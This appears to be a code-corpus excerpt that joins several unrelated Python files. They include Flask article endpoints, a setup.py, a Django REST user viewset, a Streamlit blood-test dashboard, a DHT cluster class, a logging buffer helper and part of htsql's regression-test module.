sbq2 = WxUserArticle.query.\
filter(WxUserArticle.openid == openid).\
subquery()
articles = db.session.\
query(
Article.aid,
Article.appmsgid,
Article.idx,
Article.sn,
Article.title,
Article.masssend_time,
Article.cover_url,
Article.read_num,
Article.like_num,
Article.hidden,
sbq2.c.ctime.label('star_time'),
).\
join(sbq1, sbq1.c.aid == Article.aid).\
outerjoin(sbq2, sbq2.c.aid == Article.aid).\
order_by(
Article.masssend_time.desc(),
Article.idx.asc(),
).\
all()
return {
"errcode": 0,
"articles": [ a._asdict() for a in articles ],
}
@bpMiniapp.route('/search_articles_by_keyword', methods=["GET"])
@verify_utoken
def search_articles_by_keyword():
"""
Method GET
Args:
- utoken str
- keyword str
- filter str options: ('all','favorite')/column/reporter
- page int
Return:
- errcode int
- articles [dict]
"""
openid = g.openid
keyword = get_str_field('keyword')
ft = get_str_field('filter')
page = get_int_field('page')
st, ed = get_range(page, PAGE_SIZE)
sbq1 = db.session.\
query(
Article.aid,
db.fts_match(
Article.ix_text,
keyword,
db.fts_match.BOOLEAN
).label('score')
)
if ft == 'all':
pass
elif ft == 'favorite':
sbq1 = sbq1.\
join(WxUserArticle).\
filter(WxUserArticle.openid == openid)
elif ft in COLUMNS_LIST:
sbq1 = sbq1.\
filter(Article.column == ft)
else:
sbq1 = sbq1.\
join(ArticleReporter, ArticleReporter.aid == Article.aid).\
join(Reporter, Reporter.rid == ArticleReporter.rid).\
filter(Reporter.name == ft)
sbq1 = sbq1.\
filter(Article.hidden == 0).\
order_by(
db.desc('score'),
Article.masssend_time.desc(),
Article.idx.asc(),
).\
slice(st, ed).\
subquery()
sbq2 = WxUserArticle.query.\
filter(WxUserArticle.openid == openid).\
subquery()
articles = db.session.\
query(
Article.aid,
Article.appmsgid,
Article.idx,
Article.sn,
Article.title,
Article.masssend_time,
Article.cover_url,
Article.read_num,
Article.like_num,
Article.hidden,
sbq2.c.ctime.label('star_time'),
).\
join(sbq1, sbq1.c.aid == Article.aid).\
outerjoin(sbq2, sbq2.c.aid == Article.aid).\
order_by(
sbq1.c.score.desc(),
Article.masssend_time.desc(),
Article.idx.asc(),
).\
all()
return {
"errcode": 0,
"articles": [ a._asdict() for a in articles ]
}
@bpMiniapp.route('/get_starred_articles', methods=["GET"])
@verify_utoken
def get_starred_articles():
"""
Method GET
Args:
- utoken str
- page int
"""
openid = g.openid
page = get_int_field('page')
sbq = db.session.\
query(
Article.aid,
WxUserArticle.ctime,
).\
join(WxUserArticle).\
filter(WxUserArticle.openid == openid).\
filter(Article.hidden == 0).\
order_by(WxUserArticle.ctime.desc())
if page != 0:
st, ed = get_range(page, PAGE_SIZE)
sbq = sbq.slice(st, ed)
sbq = sbq.subquery()
articles = db.session.\
query(
Article.aid,
Article.appmsgid,
Article.idx,
Article.sn,
Article.title,
Article.masssend_time,
Article.cover_url,
Article.read_num,
Article.like_num,
Article.hidden,
sbq.c.ctime.label('star_time'),
).\
join(sbq, sbq.c.aid == Article.aid).\
order_by(db.desc('star_time')).\
all()
return {
"errcode": 0,
"articles": [ a._asdict() for a in articles ]
}
@bpMiniapp.route('/star_article', methods=["POST"])
@verify_utoken
def star_article():
"""
Method POST
JSON:
- utoken str
- aid int
- action str options: ('star','unstar')
Return:
- errcode int
"""
openid = g.openid
aid = get_int_field('aid')
action = get_str_field('action', limited=['star','unstar'])
ret = db.session.\
query(Article.aid).\
filter(Article.hidden == 0).\
filter(Article.aid == aid).\
first()
if ret is None:
raise RequestArgumentError("Article %d was not found" % aid)
ua = WxUserArticle.query.\
filter(WxUserArticle.aid == aid).\
filter(WxUserArticle.openid == openid).\
first()
if action == 'star' and ua is None:
ua = WxUserArticle(openid, aid)
db.session.add(ua)
db.session.commit()
if action == 'unstar' and ua is not None:
db.session.delete(ua)
db.session.commit()
return {
"errcode": 0
}
@bpMiniapp.route('/change_setting', methods=["POST"])
@verify_utoken
def change_setting():
"""
Method POST
JSON:
- utoken str
- key str
- value bool
Return:
- errcode int
"""
openid = g.openid
key = get_str_field('key')
value = get_bool_field('value')
user = WxUser.query.get(openid)
if key == 'auto_change_card':
user.auto_change_card = value
elif key == 'use_small_card':
user.use_small_card = value
else:
raise RequestArgumentError("Invalid setting key %s" % key)
db.session.commit()
return {
"errcode": 0
}
|
nilq/baby-python
|
python
|
import os
import re
import sys
import codecs
from setuptools import setup, find_packages, Command
from setuptools.command.test import test as TestCommand
here = os.path.abspath(os.path.dirname(__file__))
setup_requires = ['pytest', 'tox']
install_requires = ['six', 'tox', 'atomos']
tests_require = ['six', 'pytest-cov', 'pytest-cache', 'pytest-timeout']
dev_requires = ['pyflakes', 'pep8', 'pylint', 'check-manifest',
'ipython', 'ipdb', 'sphinx', 'sphinx_rtd_theme',
'sphinxcontrib-napoleon']
dev_requires.extend(tests_require)
PY2 = sys.version_info.major == 2
PY3 = sys.version_info.major == 3
if PY2:
install_requires.append('futures')
install_requires.append('enum34')
if PY3:
install_requires.append('enum34')
version = "0.0.0"
changes = os.path.join(here, "CHANGES.md")
match = '^#*\s*(?P<version>[0-9]+\.[0-9]+(\.[0-9]+)?)$'
with codecs.open(changes, encoding='utf-8') as changes:
for line in changes:
match = re.match(match, line)
if match:
version = match.group("version")
break
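# For example, a CHANGES.md heading like "## 0.2.1" yields version == "0.2.1".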
# Get the long description
with codecs.open(os.path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
# Get version
with codecs.open(os.path.join(here, 'CHANGES.md'), encoding='utf-8') as f:
changelog = f.read()
class VersionCommand(Command):
description = "print library version"
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
print(version)
class PyTest(TestCommand):
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = ['--strict', '--verbose', '--tb=long',
'--cov', 'hystrix', '--cov-report',
'term-missing', 'tests']
self.test_suite = True
def run_tests(self):
import pytest
errno = pytest.main(self.test_args)
sys.exit(errno)
class Tox(TestCommand):
user_options = [('tox-args=', 'a', "Arguments to pass to tox")]
def initialize_options(self):
TestCommand.initialize_options(self)
self.tox_args = None
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
# import here, cause outside the eggs aren't loaded
import tox
import shlex
args = self.tox_args
if args:
args = shlex.split(self.tox_args)
errno = tox.cmdline(args=args)
sys.exit(errno)
setup(
name='hystrix-py',
version='0.1.0',
description='A Netflix Hystrix implementation in Python',
long_description=long_description,
url='https://github.com/wiliamsouza/hystrix-py',
author='The Hystrix Python Authors',
author_email='wiliamsouza83@gmail.com',
license='Apache Software License 2.0',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
        'Topic :: Software Development :: Libraries',
        'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
],
keywords='sample setuptools development',
packages=find_packages(exclude=['docs', 'tests']),
setup_requires=setup_requires,
install_requires=install_requires,
tests_require=tests_require,
extras_require={
'dev': dev_requires,
'test': tests_require,
},
cmdclass={
"version": VersionCommand,
'test': PyTest,
"tox": Tox,
},
)
|
nilq/baby-python
|
python
|
# Our function takes a list of words as its parameter
def find_nouns(list_of_words):
    nouns = list()
    # The first word is probably capitalized, but falls outside our definition
    for i in range(1, len(list_of_words)):
        current_word = list_of_words[i]
        if current_word[0].isupper():
            # list_of_words[i-1]: the previous word
            if not list_of_words[i-1].endswith("."):
                nouns.append(current_word)
    return nouns
with open("hase_igel.txt") as f:
story = f.read()
words = story.split()
nouns = find_nouns(words)
with open("hase_igel_nouns.txt", "w") as result:
for noun in nouns:
result.write(noun + ", ")
|
nilq/baby-python
|
python
|
from app import app
from flask import Blueprint, render_template
@app.errorhandler(404)
def not_found_error(error):
return render_template('errors/404.html'), 404
@app.errorhandler(500)
def internal_error(error):
return render_template('errors/500.html'), 500
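# A minimal sketch of how these handlers fire (assumes the same `app` object):
# with app.test_client() as client:
#     assert client.get('/definitely-missing').status_code == 404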
|
nilq/baby-python
|
python
|
import glob
import numpy as np
import sys
import argparse
def main():
parser = argparse.ArgumentParser(description="Produce report from result files")
parser.add_argument('--path', type=str, default="",
help="Path to the result files (* will be appended)")
args = parser.parse_args()
test_accuracies = []
train_accuracies = []
train_losses = []
for f in glob.glob(args.path+"*"):
with open(f) as ff:
loss, train_acc, test_acc = map(float, ff.readline().split())
test_accuracies.append(test_acc)
train_accuracies.append(train_acc)
train_losses.append(loss)
print("Test: {:.4f} ± {:.4f}".format(np.mean(test_accuracies),\
np.std(test_accuracies)))
print("Train: {:.4f} ± {:.4f}".format(np.mean(train_accuracies),\
np.std(train_accuracies)))
print("Loss: {:.4f} ± {:.4f}".format(np.mean(loss),\
np.std(loss)))
if __name__ == "__main__":
main()
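# Example invocation (script name and path prefix are illustrative; a '*' is
# appended to --path internally):
#   python report.py --path results/run1_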
|
nilq/baby-python
|
python
|
# This sample tests the case where a protocol class derives from
# another protocol class.
from typing import Generic, TypeVar, Protocol
Arg = TypeVar("Arg", contravariant=True)
Value = TypeVar("Value")
class Base1(Protocol[Value]):
def method1(self, default: Value) -> Value:
...
class Base2(Base1[Value], Protocol):
def method2(self, default: Value) -> Value:
...
class Interface(Base2[Value], Protocol[Arg, Value]):
def another(self, arg: Arg) -> None:
...
class Implementation1(Generic[Arg, Value]):
def method1(self, default: Value) -> Value:
return default
def method2(self, default: Value) -> Value:
return default
def another(self, arg: Arg) -> None:
return
def func1(arg: Arg, value: Value) -> Interface[Arg, Value]:
return Implementation1[Arg, Value]()
class Implementation2(Generic[Arg, Value]):
def method1(self, default: Value) -> Value:
return default
def another(self, arg: Arg) -> None:
return
def func2(arg: Arg, value: Value) -> Interface[Arg, Value]:
# This should generate an error because
# Implementation2 doesn't implement method2.
return Implementation2[Arg, Value]()
class Implementation3(Generic[Arg, Value]):
def method1(self, default: int) -> int:
return default
def method2(self, default: Value) -> Value:
return default
def another(self, arg: Arg) -> None:
return
def func3(arg: Arg, value: Value) -> Interface[Arg, Value]:
# This should generate an error because
# Implementation3's signature doesn't match.
return Implementation3[Arg, Value]()
|
nilq/baby-python
|
python
|
import collections
from supriya import CalculationRate
from supriya.synthdefs import WidthFirstUGen
class ClearBuf(WidthFirstUGen):
"""
::
>>> clear_buf = supriya.ugens.ClearBuf.ir(
... buffer_id=23,
... )
>>> clear_buf
ClearBuf.ir()
"""
### CLASS VARIABLES ###
__documentation_section__ = "Buffer UGens"
_ordered_input_names = collections.OrderedDict([("buffer_id", None)])
_valid_calculation_rates = (CalculationRate.SCALAR,)
|
nilq/baby-python
|
python
|
from collections import OrderedDict
from itertools import takewhile
from dht.utils import last
class Cluster(object):
def __init__(self, members):
self.hash = hash
self.members = OrderedDict(((self.hash(node), node) for node in members))
def __len__(self):
return sum((len(node) for node in self.members.values()))
def __getitem__(self, key):
return self.location(key)[key]
def __setitem__(self, key, value):
self.location(key)[key] = value
def __delitem__(self, key):
del self.location(key)[key]
def location(self, key):
"""
Returns where a given key should be stored.
"""
hashed = self.hash(key)
try:
return last(takewhile(lambda pair: pair[0] <= hashed,
self.members.items()))[1]
        except ValueError:
            # "wrap around" the ring of nodes to the last node if no nodes
            # have a hashed value that is lower than or equal to the hashed
            # value of the key (dict views are not subscriptable on Python 3,
            # hence the list() call)
            return list(self.members.values())[-1]
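# A minimal usage sketch (Node is a hypothetical hashable, dict-like member;
# the real node type lives elsewhere in the dht package):
# class Node(dict):
#     __hash__ = object.__hash__
# cluster = Cluster([Node(), Node(), Node()])
# cluster['answer'] = 42
# assert cluster['answer'] == 42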
|
nilq/baby-python
|
python
|
from typing import Optional
from pydantic import BaseSettings, Json
from ._version import version as __version__ # NOQA
class Settings(BaseSettings):
auth_token_url: str = "https://solarperformanceinsight.us.auth0.com/oauth/token"
auth_jwk_url: str = (
"https://solarperformanceinsight.us.auth0.com/.well-known/jwks.json"
)
auth_key: Json
auth_audience: str = "https://app.solarperformanceinsight.org/api"
auth_issuer: str = "https://solarperformanceinsight.us.auth0.com/"
auth_client_id: str = "G1YyfLdseYn10RQo11Lqee2ThXj5l5fh"
traces_sample_rate: Optional[float] = None
class Config:
env_prefix = "spi"
settings = Settings()
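# With env_prefix = "spi", fields are read from environment variables such as
# SPI_AUTH_KEY (which must hold valid JSON, per the Json type) and
# SPI_TRACES_SAMPLE_RATE; the values below are illustrative:
#   export SPI_AUTH_KEY='{"kty": "RSA"}'
#   export SPI_TRACES_SAMPLE_RATE=0.25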
|
nilq/baby-python
|
python
|
from rest_framework import viewsets, status
from rest_framework.response import Response
from rest_framework.decorators import action
from backend.api.models import MiembroSprint, Usuario, Rol
from backend.api.serializers import UsuarioSerializer
class UsuarioViewSet(viewsets.ViewSet):
"""
UsuarioViewSet View para el modelo Usuario
Args:
viewsets (module): tipo de clase basado en view
"""
@action(detail=False, methods=['GET'])
def me(self, request):
"""Obtiene el usuario autenticado
Args:
request (Any): request
"""
usuario_request = Usuario.objects.get(user=request.user)
serializer = UsuarioSerializer(usuario_request, many=False)
return Response(serializer.data)
def list(self, request):
"""
list Lista todos los usuarios del sistema
Args:
request (Any): request
Returns:
json: lista de usuarios en formato json
"""
usuario_request = Usuario.objects.get(user=request.user)
if not usuario_request.tiene_permiso("ver_usuarios"):
response = {
"message": "No tiene permiso para realizar esta acción",
"permission_required": ["ver_usuarios"]
}
return Response(response, status=status.HTTP_403_FORBIDDEN)
usuarios = Usuario.objects.all()
serializer = UsuarioSerializer(usuarios, many=True)
return Response(serializer.data)
def retrieve(self, request, pk=None):
"""
retrieve Obtiene un usuario mediante su pk
Args:
request (Any): request
pk (integer, opcional): primary key. Defaults to None.
Returns:
json: usuario obtenido en formato json
"""
try:
usuario_request = Usuario.objects.get(user=request.user)
if not usuario_request.tiene_permiso("ver_usuarios"):
response = {
"message": "No tiene permiso para realizar esta acción",
"permission_required": ["ver_usuarios"]
}
return Response(response, status=status.HTTP_403_FORBIDDEN)
usuario = Usuario.objects.get(pk=pk)
serializer = UsuarioSerializer(usuario, many=False)
return Response(serializer.data)
except Usuario.DoesNotExist:
response = {"message": "No existe el usuario"}
return Response(response, status=status.HTTP_404_NOT_FOUND)
@action(detail=True, methods=['POST'])
def activar(self, request, pk=None):
"""
activar Activa el usuario con la pk especificada
Args:
request (Any): request
pk (integer, opcional): primary key. Defaults to None.
Returns:
json: usuario activado en formato json
"""
try:
usuario_request = Usuario.objects.get(user=request.user)
if not usuario_request.tiene_permiso("activar_usuarios"):
response = {
"message": "No tiene permiso para realizar esta acción",
"permission_required": ["activar_usuarios"]
}
return Response(response, status=status.HTTP_403_FORBIDDEN)
usuario = Usuario.objects.get(pk=pk)
usuario.activar()
serializer = UsuarioSerializer(usuario, many=False)
return Response(serializer.data)
except Usuario.DoesNotExist:
response = {"message": "No existe el usuario"}
return Response(response, status=status.HTTP_404_NOT_FOUND)
@action(detail=True, methods=['POST'])
def desactivar(self, request, pk=None):
"""
desactivar Desactiva el usuario con la pk especificada
Args:
request (Any): request
pk (integer, opcional): primary key. Defaults to None.
Returns:
json: usuario desactivado en formato json
"""
try:
usuario_request = Usuario.objects.get(user=request.user)
if not usuario_request.tiene_permiso("desactivar_usuarios"):
response = {
"message": "No tiene permiso para realizar esta acción",
"permission_required": ["desactivar_usuarios"]
}
return Response(response, status=status.HTTP_403_FORBIDDEN)
usuario = Usuario.objects.get(pk=pk)
if usuario_request == usuario:
response = {"message": "No puedes desactivarte a ti mismo"}
return Response(response, status=status.HTTP_409_CONFLICT)
if MiembroSprint.pertenece_a_sprint_activo(usuario):
response = {
"message": "Este usuario pertenece a un Sprint Activo",
"error": "conflict"
}
return Response(response, status=status.HTTP_409_CONFLICT)
usuario.desactivar()
serializer = UsuarioSerializer(usuario, many=False)
return Response(serializer.data)
except Usuario.DoesNotExist:
response = {"message": "No existe el usuario"}
return Response(response, status=status.HTTP_404_NOT_FOUND)
@action(detail=True, methods=['POST'])
def asignar_rol(self, request, pk=None):
"""
asignar_rol Asigna un rol a un usuario
Args:
request (Any): request
pk (int, opcional): primary key. Defaults to None.
Returns:
json: html response
"""
try:
usuario_request = Usuario.objects.get(user=request.user)
usuario = Usuario.objects.get(pk=pk)
if not (usuario_request.tiene_permiso("ver_usuarios") and usuario_request.tiene_permiso("ver_roles")
and usuario_request.tiene_permiso("asignar_roles")):
response = {
"message": "No tiene permiso para realizar esta acción",
"permission_required": [
"ver_usuarios",
"ver_roles",
"asignar_roles"
]
}
return Response(response, status=status.HTTP_403_FORBIDDEN)
if usuario_request == usuario:
response = {"message": "No puede asignarse roles a sí mismo"}
return Response(response, status=status.HTTP_403_FORBIDDEN)
rol = Rol.objects.get(pk=request.data['id'])
usuario.asignar_rol(rol)
serializer = UsuarioSerializer(usuario, many=False)
return Response(serializer.data)
except Usuario.DoesNotExist:
response = {"message": "No existe el usuario"}
return Response(response, status=status.HTTP_404_NOT_FOUND)
except Rol.DoesNotExist:
response = {"message": "No existe el rol"}
return Response(response, status=status.HTTP_404_NOT_FOUND)
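# A minimal registration sketch (assumes DRF's DefaultRouter; the URL prefix
# is illustrative, and basename is required because this ViewSet has no queryset):
# from rest_framework.routers import DefaultRouter
# router = DefaultRouter()
# router.register(r'usuarios', UsuarioViewSet, basename='usuario')
# urlpatterns = router.urls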
|
nilq/baby-python
|
python
|
from thenewboston.accounts.manage import create_account
from thenewboston.verify_keys.verify_key import encode_verify_key
def random_encoded_account_number():
signing_key, account_number = create_account()
return encode_verify_key(verify_key=account_number)
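# A usage sketch; assuming encode_verify_key returns the account number as an
# encoded (hex) string:
# account_number = random_encoded_account_number()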
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
import streamlit as st
import numpy as np
import pandas as pd
import altair as alt
from io import BytesIO
def to_excel(df):
output = BytesIO()
writer = pd.ExcelWriter(output, engine='xlsxwriter')
df.to_excel(writer, index=True, sheet_name='杜子期血常规数据统计')
workbook = writer.book
worksheet = writer.sheets['杜子期血常规数据统计']
format1 = workbook.add_format({'num_format': '0.00'})
worksheet.set_column('A:Z', None, format1)
writer.save()
processed_data = output.getvalue()
return processed_data
st.set_page_config(layout='wide')
pd.set_option("display.max_colwidth", 1000, 'display.width', 1000)
def highlight_dataframe(s):
lst = []
for i in range(0, len(s) - 1, 2):
try:
tmp = float(s[i])
min, max = s[i+1].split('~')
if tmp < float(min):
lst.append('color: orange')
elif tmp > float(max):
lst.append('color: red')
else:
lst.append('')
except Exception as e:
lst.append('')
#print(s[i], s[i+1], e)
lst.append('')
return lst
items_map = {
'白细胞计数(WBC)(10^9/L)': '白细胞计数(WBC)(10^9/L)',
'淋巴细胞绝对值(LYM#)(10^9/L)': '淋巴细胞绝对值(LYM#)(10^9/L)',
'中性粒细胞绝对值(NEU#)(10^9/L)': '中性粒细胞绝对值(NEU#)(10^9/L)',
'单核细胞绝对值(MON#)(10^9/L)': '单核细胞绝对值(MON#)(10^9/L)',
'嗜酸性粒细胞绝对值(EOS#)(EOS#)(10^9/L)': '嗜酸性粒细胞绝对值(EOS#)(EOS#)(10^9/L)',
'嗜碱性粒细胞绝对值(BAS#)(BAS#)(10^9/L)': '嗜碱性粒细胞绝对值(BAS#)(BAS#)(10^9/L)',
'红细胞体积分布宽度-CV(RDW-CV)(%)': '红细胞体积分布宽度-CV(RDW-CV)(%)',
'红细胞体积分布宽度-SD(RDW-SD)(fL)': '红细胞体积分布宽度-SD(RDW-SD)(fL)',
'血小板体积分布宽度(PDW)(%)': '血小板体积分布宽度(PDW)(%)',
'血小板平均体积(MPV)(fL)': '血小板平均体积(MPV)(fL)',
'血小板压积(PCT)(%)': '血小板压积(PCT)(%)',
'嗜碱性粒细胞百分比(BAS%)(BAS%)(%)': '嗜碱性粒细胞百分比(BAS%)(BAS%)(%)',
'嗜酸性粒细胞百分比(EO%)(EOS%)(%)': '嗜酸性粒细胞百分比(EO%)(EOS%)(%)',
'红细胞计数(RBC)(10^12/L)': '红细胞计数(RBC)(10^12/L)',
'血红蛋白浓度(HGB)(g/L)': '血红蛋白浓度(HGB)(g/L)',
'红细胞压积(HCT)(%)': '红细胞压积(HCT)(%)',
'平均红细胞体积(MCV)(fL)': '平均红细胞体积(MCV)(fL)',
'平均红细胞血红蛋白含量(MCH)(MCH)(pg)': '平均红细胞血红蛋白含量(MCH)(MCH)(pg)',
'平均红细胞血红蛋白浓度(MCHC)(MCHC)(g/L)': '平均红细胞血红蛋白浓度(MCHC)(MCHC)(g/L)',
'血小板计数(PLT)(10^9/L)': '血小板计数(PLT)(10^9/L)',
'淋巴细胞百分比(LYM%)(%)': '淋巴细胞百分比(LYM%)(%)',
'中性粒细胞百分比(NEU%)(%)': '中性粒细胞百分比(NEU%)(%)',
'单核细胞百分比(MON%)(%)': '单核细胞百分比(MON%)(%)',
'大血小板比率(P-LC,R)': '大血小板比率(P-LC,R)',
'嗜碱性粒细胞计数(BASO#)(10^9/L)': '嗜碱性粒细胞绝对值(BAS#)(BAS#)(10^9/L)',
'血小板平均体积(MPV)(fL)': '血小板平均体积(MPV)(fL)',
'中性粒细胞计数(NEUT#)(10^9/L)': '中性粒细胞绝对值(NEU#)(10^9/L)',
'中性粒细胞百分比(NEUT%)(%)': '中性粒细胞百分比(NEU%)(%)',
'血小板压积(PCT)(%)': '血小板压积(PCT)(%)',
'血小板分布宽度(PDW)(%)': '血小板体积分布宽度(PDW)(%)',
'大血小板比率(P-LCR)': '大血小板比率(P-LC,R)',
'血小板总数(PLT)(10^9/L)': '血小板计数(PLT)(10^9/L)',
'红细胞计数(RBC)(10^12/L)': '红细胞计数(RBC)(10^12/L)',
'红细胞分布宽度CV(RDW-CV)(%)': '红细胞体积分布宽度-CV(RDW-CV)(%)',
'红细胞分布宽度-SD(RDW-SD)(fL)': '红细胞体积分布宽度-SD(RDW-SD)(fL)',
'单核细胞百分比(MONO%)(%)': '单核细胞百分比(MON%)(%)',
'单核细胞计数(MONO#)(10^9/L)': '单核细胞绝对值(MON#)(10^9/L)',
'平均红细胞体积(MCV)(fL)': '平均红细胞体积(MCV)(fL)',
'嗜碱性粒细胞百分比(BASO%)(%)': '嗜碱性粒细胞百分比(BAS%)(BAS%)(%)',
#'C-反应蛋白(CRP)(mg/L)',
'嗜酸性粒细胞计数(EO#)(10^9/L)': '嗜酸性粒细胞绝对值(EOS#)(EOS#)(10^9/L)',
'嗜酸性粒细胞百分比(EO%)(%)': '嗜酸性粒细胞百分比(EO%)(EOS%)(%)',
'红细胞压积(HCT)(%)': '红细胞压积(HCT)(%)',
'血红蛋白(HGB)(g/L)': '血红蛋白浓度(HGB)(g/L)',
'淋巴细胞计数(LYMPH#)(10^9/L)': '淋巴细胞绝对值(LYM#)(10^9/L)',
'淋巴细胞百分比(LYMPH%)(%)': '淋巴细胞百分比(LYM%)(%)',
'平均血红蛋白含量(MCH)(pg)': '平均红细胞血红蛋白含量(MCH)(MCH)(pg)',
'平均血红蛋白浓度(MCHC)(g/L)': '平均红细胞血红蛋白浓度(MCHC)(MCHC)(g/L)',
'白细胞数目(WBC)(10^9/L)': '白细胞计数(WBC)(10^9/L)'
}
items = set(items_map.values())
items_ref = [x + '_参考范围' for x in items]
df = pd.read_excel('杜子期血常规.xlsx', engine='openpyxl')
df_new = pd.DataFrame([], index=[rv for r in zip(items, items_ref) for rv in r])
for index, row in df.iteritems():
df_new[index] = ''
for i, item in enumerate(row):
if item in items_map:
try:
df_new[index][items_map[item]] = float(row[i + 1])
            except (ValueError, TypeError):
df_new[index][items_map[item]] = np.nan
df_new[index][items_map[item] + '_参考范围'] = row[i + 2]
df_new.columns = np.array([x.date() for x in df_new.columns])
st.title('杜子期血常规数据统计')
df_new_str = df_new.astype(str)
st.write(df_new_str.style.apply(highlight_dataframe, axis=0))
st.download_button("Export to Excel", data=to_excel(df_new), file_name='杜子期血常规数据统计.xlsx')
chart_items = set()
#other = st.sidebar.expander('其他选项')
#if other.checkbox('显示原始数据'):
# st.write(df)
#st.sidebar.write('')
st.sidebar.write('请选择画图项')
if st.sidebar.checkbox('所有项'):
chart_items = set(items)
for item in items:
if st.sidebar.checkbox(item):
chart_items.add(item)
if chart_items:
df = df_new.loc[chart_items, :].T
#df.index = df.index.to_numpy(dtype='datetime64')
st.line_chart(df)
else:
df = df_new.loc['血小板计数(PLT)(10^9/L)', :].T
st.line_chart(df_new.loc['血小板计数(PLT)(10^9/L)'].T)
#df = df_new.loc['血小板计数(PLT)(10^9/L)'].T
df = df_new.T
df['date'] = df.index
st.vega_lite_chart(data=df, spec={
'mark': {
'type': 'line',
'point': True,
'tooltip': True
},
'encoding': {
'x': {
"type": "temporal",
#'timeUnit': 'date',
'field': 'date',
},
'y': {
"type": "quantitative",
'field': '血小板计数(PLT)(10^9/L)'
#'field': list(chart_items)
}
}
}, use_container_width=True)
st.write('相关系数矩阵')
df = df_new.filter(regex='^((?!_参考范围$).)*$', axis=0).astype(float)
st.write(df.T.corr())
cor_data = df.T.corr().stack().reset_index().rename(columns={0: 'correlation', 'level_0': 'variable', 'level_1': 'variable2'})
cor_data['correlation_label'] = cor_data['correlation'].map('{:.2f}'.format)
base = alt.Chart(cor_data).encode(
x='variable2:O',
y='variable:O'
)
# Text layer with correlation labels
# Colors are for easier readability
text = base.mark_text().encode(
text='correlation_label',
color=alt.condition(
alt.datum.correlation > 0.5,
alt.value('white'),
alt.value('black')
)
)
# The correlation heatmap itself
cor_plot = base.mark_rect().encode(
color='correlation:Q'
)
st.altair_chart(cor_plot + text, use_container_width=True)
|
nilq/baby-python
|
python
|
import asyncio
import logging
import logging.handlers
import time
from contextlib import suppress
from typing import Optional, Union
from ..thread_pool import run_in_new_thread
def _thread_flusher(
handler: logging.handlers.MemoryHandler,
flush_interval: Union[float, int],
loop: asyncio.AbstractEventLoop,
) -> None:
def has_no_target() -> bool:
return True
def has_target() -> bool:
return bool(handler.target) # type: ignore
is_target = has_no_target
if isinstance(handler, logging.handlers.MemoryHandler):
is_target = has_target
while not loop.is_closed() and is_target():
with suppress(Exception):
if handler.buffer:
handler.flush()
time.sleep(flush_interval)
def wrap_logging_handler(
handler: logging.Handler,
loop: Optional[asyncio.AbstractEventLoop] = None,
buffer_size: int = 1024,
flush_interval: Union[float, int] = 0.1,
) -> logging.Handler:
loop = loop or asyncio.get_event_loop()
buffered_handler = logging.handlers.MemoryHandler(
buffer_size,
target=handler,
flushLevel=logging.CRITICAL,
)
run_in_new_thread(
_thread_flusher, args=(
buffered_handler, flush_interval, loop,
), no_return=True,
)
return buffered_handler
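# A minimal usage sketch (assumes an asyncio event loop object is available;
# the background flusher thread exits once that loop is closed):
# loop = asyncio.new_event_loop()
# handler = wrap_logging_handler(logging.StreamHandler(), loop=loop)
# logging.getLogger().addHandler(handler)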
|
nilq/baby-python
|
python
|
#
# Copyright (c) 2006-2013, Prometheus Research, LLC
#
"""
:mod:`htsql.ctl.regress`
========================
This module implements the `regress` routine.
"""
from .error import ScriptError
from .routine import Argument, Routine
from .option import (InputOption, TrainOption, PurgeOption,
ForceOption, QuietOption)
from .request import Request
from ..core.validator import (Validator, BoolVal, StrVal, WordVal,
ChoiceVal, IntVal, UFloatVal, DBVal, SeqVal,
MapVal, ClassVal, AnyVal)
from ..core.util import maybe, trim_doc, DB
import traceback
import io
import sys
import os, os.path
import shutil
import re
import difflib
import tempfile
import subprocess
import atexit
import time
import yaml, yaml.constructor
# Indicates that a field has no default value and therefore cannot be omitted.
MANDATORY_FIELD = object()
# Return values for `ask_*` methods indicating the user-chosen action.
DO_CONTINUE = object()
DO_DISCARD = object()
DO_HALT = object()
DO_RECORD = object()
DO_SAVE = object()
DO_SKIP = object()
class TermStringIO(io.StringIO):
"""
A readable file-like object with an "echo". Whenever some content is read
from it, the same content is echoed to the specified `output` stream.
Use :class:`TermStringIO` to preserve the content of interactive
sessions with pre-recorded input. Assign::
        sys.stdout = io.StringIO()
        sys.stdin = TermStringIO(input, sys.stdout)
where `input` contains the pre-recorded input data. After the
session is done, the content of `sys.stdout` will be the same as
if the session was performed on a real terminal with echo enabled.
`buf` (a string)
The content of the stream.
`output` (a writable file-like object)
A stream that records data being read.
"""
def __init__(self, buf, output):
io.StringIO.__init__(self, buf)
self.output = output
def read(self, n=-1):
data = io.StringIO.read(self, n)
self.output.write(data)
return data
def readline(self, length=None):
data = io.StringIO.readline(self, length)
self.output.write(data)
return data
class Field(object):
"""
Describes a parameter of test data.
`attribute` (a string)
The name of the attribute that contains the field value.
`val` (:class:`htsql.validator.Validator`)
The validator for the field values.
`default`
The default value of the field. If not provided, the field
cannot be omitted. The `is_mandatory` attribute indicates if
the `default` value is provided.
`hint` (a string or ``None``)
A short one-line description of the field.
"""
# Use it to filter out `AnyField` instances.
is_any = False
def __init__(self, attribute, val,
default=MANDATORY_FIELD, hint=None):
# Sanity check on the arguments.
assert isinstance(attribute, str)
assert re.match(r'^[a-zA-Z_][0-9a-zA-Z_]*$', attribute)
assert isinstance(val, Validator)
assert isinstance(hint, maybe(str))
self.attribute = attribute
self.val = val
self.default = default
self.is_mandatory = (default is MANDATORY_FIELD)
self.hint = hint
def get_hint(self):
"""
Returns short one-line description of the field.
"""
return self.hint
def get_signature(self):
"""
Returns the field name.
"""
signature = self.attribute.replace('_', '-')
if self.is_mandatory:
signature += '*'
return signature
class AnyField(object):
"""
Indicates that test data may contain extra fields.
Add ``AnyField()`` to the `fields` list to indicate that YAML
representation of test data may contain some attributes not
described by other fields. These extra attributes will be
silently ignored.
"""
# Use it to filter out `AnyField` instances.
is_any = True
class TestData(object):
"""
Represents input or output data of a test case.
This is an abstract class. Create a subclass of :class:`TestData`
to describe input or output data for a specific test kind. You need
to specify the format of test data using the `fields` class attribute.
The `fields` attribute is a list of :class:`Field` instances. Each
field describes an attribute of test data.
